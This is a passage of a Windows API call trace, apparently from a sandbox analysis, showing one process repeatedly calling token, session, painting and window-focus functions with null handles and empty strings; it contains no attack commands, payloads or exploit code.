TokenHandle=0x209a42c*=0x5a8) returned 1 [0221.434] GetTokenInformation (in: TokenHandle=0x5a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.434] GetLastError () returned 0x7a [0221.434] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.434] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.450] WTSFreeMemory (pMemory=0x0) [0221.450] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.451] TextOutW (hdc=0x0, x=2234, y=5349, lpString="", c=0) returned 1 [0221.451] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.451] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.451] GetTickCount () returned 0xe4c2 [0221.451] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.451] SetForegroundWindow (hWnd=0x0) returned 0 [0221.451] BringWindowToTop (hWnd=0x0) returned 0 [0221.451] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5ac) returned 1 [0221.451] GetTokenInformation (in: TokenHandle=0x5ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.451] GetLastError () returned 0x7a [0221.451] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.451] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.452] WTSFreeMemory (pMemory=0x0) [0221.452] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.452] TextOutW (hdc=0x0, x=2244, y=5374, lpString="", c=0) returned 1 [0221.452] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.452] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.452] GetTickCount () returned 0xe4c2 [0221.452] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.452] SetForegroundWindow (hWnd=0x0) returned 0 [0221.452] BringWindowToTop (hWnd=0x0) returned 0 [0221.452] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5b0) returned 1 [0221.452] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.452] GetLastError () returned 0x7a [0221.452] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.452] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.453] WTSFreeMemory (pMemory=0x0) [0221.453] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.453] TextOutW (hdc=0x0, x=2254, y=5399, lpString="", c=0) returned 1 [0221.453] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.453] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.453] GetTickCount () returned 0xe4c2 [0221.454] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.454] SetForegroundWindow (hWnd=0x0) returned 0 [0221.454] BringWindowToTop (hWnd=0x0) returned 0 [0221.454] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5b4) returned 1 [0221.454] GetTokenInformation (in: TokenHandle=0x5b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.454] GetLastError () returned 0x7a [0221.454] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.454] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.454] WTSFreeMemory (pMemory=0x0) [0221.454] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.455] TextOutW (hdc=0x0, x=2264, y=5424, lpString="", c=0) returned 1 [0221.455] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.455] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.455] GetTickCount () returned 0xe4c2 [0221.455] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.455] SetForegroundWindow (hWnd=0x0) returned 0 [0221.455] BringWindowToTop (hWnd=0x0) returned 0 [0221.455] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5b8) returned 1 [0221.455] GetTokenInformation (in: TokenHandle=0x5b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.455] GetLastError () returned 0x7a [0221.455] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.455] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.456] WTSFreeMemory (pMemory=0x0) [0221.456] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.456] TextOutW (hdc=0x0, x=2274, y=5449, lpString="", c=0) returned 1 [0221.456] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.456] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.456] GetTickCount () returned 0xe4c2 [0221.456] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.456] SetForegroundWindow (hWnd=0x0) returned 0 [0221.456] BringWindowToTop (hWnd=0x0) returned 0 [0221.456] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5bc) returned 1 [0221.457] GetTokenInformation (in: TokenHandle=0x5bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.457] GetLastError () returned 0x7a [0221.457] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.457] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.457] WTSFreeMemory (pMemory=0x0) [0221.457] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.457] TextOutW (hdc=0x0, x=2284, y=5474, lpString="", c=0) returned 1 [0221.457] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.457] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.457] GetTickCount () returned 0xe4c2 [0221.458] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.458] SetForegroundWindow (hWnd=0x0) returned 0 [0221.458] BringWindowToTop (hWnd=0x0) returned 0 [0221.458] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5c0) returned 1 [0221.458] GetTokenInformation (in: TokenHandle=0x5c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.458] GetLastError () returned 0x7a [0221.458] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.458] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.459] WTSFreeMemory (pMemory=0x0) [0221.459] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.459] TextOutW (hdc=0x0, x=2294, y=5499, lpString="", c=0) returned 1 [0221.459] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.459] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.459] GetTickCount () returned 0xe4c2 [0221.459] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.459] SetForegroundWindow (hWnd=0x0) returned 0 [0221.459] BringWindowToTop (hWnd=0x0) returned 0 [0221.459] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5c4) returned 1 [0221.459] GetTokenInformation (in: TokenHandle=0x5c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.459] GetLastError () returned 0x7a [0221.459] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.459] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.460] WTSFreeMemory (pMemory=0x0) [0221.460] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.460] TextOutW (hdc=0x0, x=2304, y=5524, lpString="", c=0) returned 1 [0221.460] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.460] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.460] GetTickCount () returned 0xe4c2 [0221.460] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.460] SetForegroundWindow (hWnd=0x0) returned 0 [0221.460] BringWindowToTop (hWnd=0x0) returned 0 [0221.461] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5c8) returned 1 [0221.461] GetTokenInformation (in: TokenHandle=0x5c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.461] GetLastError () returned 0x7a [0221.461] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.461] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.461] WTSFreeMemory (pMemory=0x0) [0221.461] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.461] TextOutW (hdc=0x0, x=2314, y=5549, lpString="", c=0) returned 1 [0221.461] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.461] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.462] GetTickCount () returned 0xe4d2 [0221.466] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.466] SetForegroundWindow (hWnd=0x0) returned 0 [0221.466] BringWindowToTop (hWnd=0x0) returned 0 [0221.466] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5cc) returned 1 [0221.466] GetTokenInformation (in: TokenHandle=0x5cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.466] GetLastError () returned 0x7a [0221.466] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.466] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.467] WTSFreeMemory (pMemory=0x0) [0221.467] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.467] TextOutW (hdc=0x0, x=2324, y=5574, lpString="", c=0) returned 1 [0221.467] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.467] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.467] GetTickCount () returned 0xe4d2 [0221.467] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.467] SetForegroundWindow (hWnd=0x0) returned 0 [0221.467] BringWindowToTop (hWnd=0x0) returned 0 [0221.467] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5d0) returned 1 [0221.467] GetTokenInformation (in: TokenHandle=0x5d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.467] GetLastError () returned 0x7a [0221.467] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.467] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.468] WTSFreeMemory (pMemory=0x0) [0221.468] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.468] TextOutW (hdc=0x0, x=2334, y=5599, lpString="", c=0) returned 1 [0221.468] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.468] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.468] GetTickCount () returned 0xe4d2 [0221.468] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.469] SetForegroundWindow (hWnd=0x0) returned 0 [0221.469] BringWindowToTop (hWnd=0x0) returned 0 [0221.469] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5d4) returned 1 [0221.469] GetTokenInformation (in: TokenHandle=0x5d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.469] GetLastError () returned 0x7a [0221.469] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.469] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.469] WTSFreeMemory (pMemory=0x0) [0221.469] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.470] TextOutW (hdc=0x0, x=2344, y=5624, lpString="", c=0) returned 1 [0221.470] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.470] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.470] GetTickCount () returned 0xe4d2 [0221.470] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.470] SetForegroundWindow (hWnd=0x0) returned 0 [0221.470] BringWindowToTop (hWnd=0x0) returned 0 [0221.470] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5d8) returned 1 [0221.470] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.470] GetLastError () returned 0x7a [0221.470] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.470] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.471] WTSFreeMemory (pMemory=0x0) [0221.471] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.471] TextOutW (hdc=0x0, x=2354, y=5649, lpString="", c=0) returned 1 [0221.471] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.471] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.471] GetTickCount () returned 0xe4d2 [0221.471] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.471] SetForegroundWindow (hWnd=0x0) returned 0 [0221.471] BringWindowToTop (hWnd=0x0) returned 0 [0221.471] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5dc) returned 1 [0221.471] GetTokenInformation (in: TokenHandle=0x5dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.472] GetLastError () returned 0x7a [0221.472] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.472] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.472] WTSFreeMemory (pMemory=0x0) [0221.472] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.472] TextOutW (hdc=0x0, x=2364, y=5674, lpString="", c=0) returned 1 [0221.472] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.472] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.472] GetTickCount () returned 0xe4d2 [0221.473] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.473] SetForegroundWindow (hWnd=0x0) returned 0 [0221.473] BringWindowToTop (hWnd=0x0) returned 0 [0221.473] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5e0) returned 1 [0221.473] GetTokenInformation (in: TokenHandle=0x5e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.473] GetLastError () returned 0x7a [0221.473] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.473] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.474] WTSFreeMemory (pMemory=0x0) [0221.474] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.474] TextOutW (hdc=0x0, x=2374, y=5699, lpString="", c=0) returned 1 [0221.474] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.474] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.474] GetTickCount () returned 0xe4d2 [0221.474] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.474] SetForegroundWindow (hWnd=0x0) returned 0 [0221.474] BringWindowToTop (hWnd=0x0) returned 0 [0221.474] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5e4) returned 1 [0221.474] GetTokenInformation (in: TokenHandle=0x5e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.474] GetLastError () returned 0x7a [0221.474] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.474] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.475] WTSFreeMemory (pMemory=0x0) [0221.475] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.475] TextOutW (hdc=0x0, x=2384, y=5724, lpString="", c=0) returned 1 [0221.475] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.475] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.475] GetTickCount () returned 0xe4d2 [0221.475] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.475] SetForegroundWindow (hWnd=0x0) returned 0 [0221.475] BringWindowToTop (hWnd=0x0) returned 0 [0221.476] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5e8) returned 1 [0221.476] GetTokenInformation (in: TokenHandle=0x5e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.476] GetLastError () returned 0x7a [0221.476] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.476] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.476] WTSFreeMemory (pMemory=0x0) [0221.476] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.476] TextOutW (hdc=0x0, x=2394, y=5749, lpString="", c=0) returned 1 [0221.476] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.476] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.476] GetTickCount () returned 0xe4d2 [0221.477] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.477] SetForegroundWindow (hWnd=0x0) returned 0 [0221.477] BringWindowToTop (hWnd=0x0) returned 0 [0221.477] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5ec) returned 1 [0221.477] GetTokenInformation (in: TokenHandle=0x5ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.477] GetLastError () returned 0x7a [0221.477] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.477] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.478] WTSFreeMemory (pMemory=0x0) [0221.478] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.478] TextOutW (hdc=0x0, x=2404, y=5774, lpString="", c=0) returned 1 [0221.478] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.478] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.478] GetTickCount () returned 0xe4e1 [0221.479] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.479] SetForegroundWindow (hWnd=0x0) returned 0 [0221.479] BringWindowToTop (hWnd=0x0) returned 0 [0221.479] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5f0) returned 1 [0221.479] GetTokenInformation (in: TokenHandle=0x5f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.479] GetLastError () returned 0x7a [0221.479] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.479] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.479] WTSFreeMemory (pMemory=0x0) [0221.479] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.480] TextOutW (hdc=0x0, x=2414, y=5799, lpString="", c=0) returned 1 [0221.480] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.480] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.480] GetTickCount () returned 0xe4e1 [0221.480] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.480] SetForegroundWindow (hWnd=0x0) returned 0 [0221.480] BringWindowToTop (hWnd=0x0) returned 0 [0221.480] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5f4) returned 1 [0221.480] GetTokenInformation (in: TokenHandle=0x5f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.480] GetLastError () returned 0x7a [0221.480] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.480] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.481] WTSFreeMemory (pMemory=0x0) [0221.481] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.481] TextOutW (hdc=0x0, x=2424, y=5824, lpString="", c=0) returned 1 [0221.481] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.481] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.481] GetTickCount () returned 0xe4e1 [0221.481] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.481] SetForegroundWindow (hWnd=0x0) returned 0 [0221.481] BringWindowToTop (hWnd=0x0) returned 0 [0221.481] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x5f8) returned 1 [0221.481] GetTokenInformation (in: TokenHandle=0x5f8, 